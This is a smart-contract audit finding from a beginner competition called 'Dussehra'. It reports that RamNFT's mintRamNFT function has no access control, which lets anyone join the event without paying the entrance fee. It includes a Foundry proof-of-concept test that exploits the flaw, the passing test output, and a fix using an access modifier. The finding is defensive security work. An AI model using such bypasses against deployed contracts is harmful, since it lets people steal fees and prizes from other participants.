First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

### [H-1] Attacker can bypass `entranceFee` and participate in the event without paying.

Keyword

[H-1] Attacker can bypass entranceFee and participate in the event without paying.

Description: According to the sponsor the RamNFT::mintRamNFT function should be callable by the Dussehra contract. This is not the case though. The function is public, has no access control, and anyone can call it directly.

Impact: A malicious user is able to participate in the event, and bypassing paying the entranceFee. They can mint an NFT directly from the RamNFT contract and then call the ChoosingRam::increaseValuesOfParticipants, Dussehra::killRavana and Dussehra::withdraw functions just like any other user.

Proof of Concepts: Input the test below in the Dussehra.t.sol file.

PoC - Click the arrow below
function test_bypassEntranceFee() public {
vm.startPrank(player1);
ramNFT.mintRamNFT(address(player1));
ramNFT.mintRamNFT(address(player1));
ramNFT.mintRamNFT(address(player1));
assertEq(ramNFT.ownerOf(0), player1);
assertEq(ramNFT.ownerOf(1), player1);
assertEq(ramNFT.ownerOf(2), player1);
assertEq(ramNFT.getCharacteristics(0).ram, player1);
assertEq(ramNFT.getCharacteristics(1).ram, player1);
assertEq(ramNFT.getCharacteristics(2).ram, player1);
assertEq(ramNFT.getNextTokenId(), 3);
choosingRam.increaseValuesOfParticipants(0, 1);
choosingRam.increaseValuesOfParticipants(0, 1);
choosingRam.increaseValuesOfParticipants(0, 1);
choosingRam.increaseValuesOfParticipants(0, 1);
choosingRam.increaseValuesOfParticipants(0, 1);
vm.stopPrank();
assertEq(ramNFT.getCharacteristics(1).isSatyavaakyah, true);
vm.warp(1728691200 + 1);
vm.startPrank(organiser);
choosingRam.selectRamIfNotSelected();
vm.stopPrank();
vm.startPrank(player1);
dussehra.killRavana();
vm.stopPrank();
assertEq(dussehra.IsRavanKilled(), true);
}

Test output

Ran 1 test for test/Dussehra.t.sol:CounterTest
[PASS] test_bypassEntranceFee() (gas: 363167)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.26ms (496.85µs CPU time)
Ran 1 test suite in 5.83ms (1.26ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Recommended mitigation: Add an onlyDussehra modifier on the RamNFT::mintRamNFT function so that it can be called only by the Dussehra contract address.

address public dussehraContract; //needs to be added in the RamNFT contract and it can be set in the constructor
modifier onlyDussehra() {
require(msg.sender == dussehraContract, "Only Dussehra contract can mint");
_;
}
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

mintRamNFT is public

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.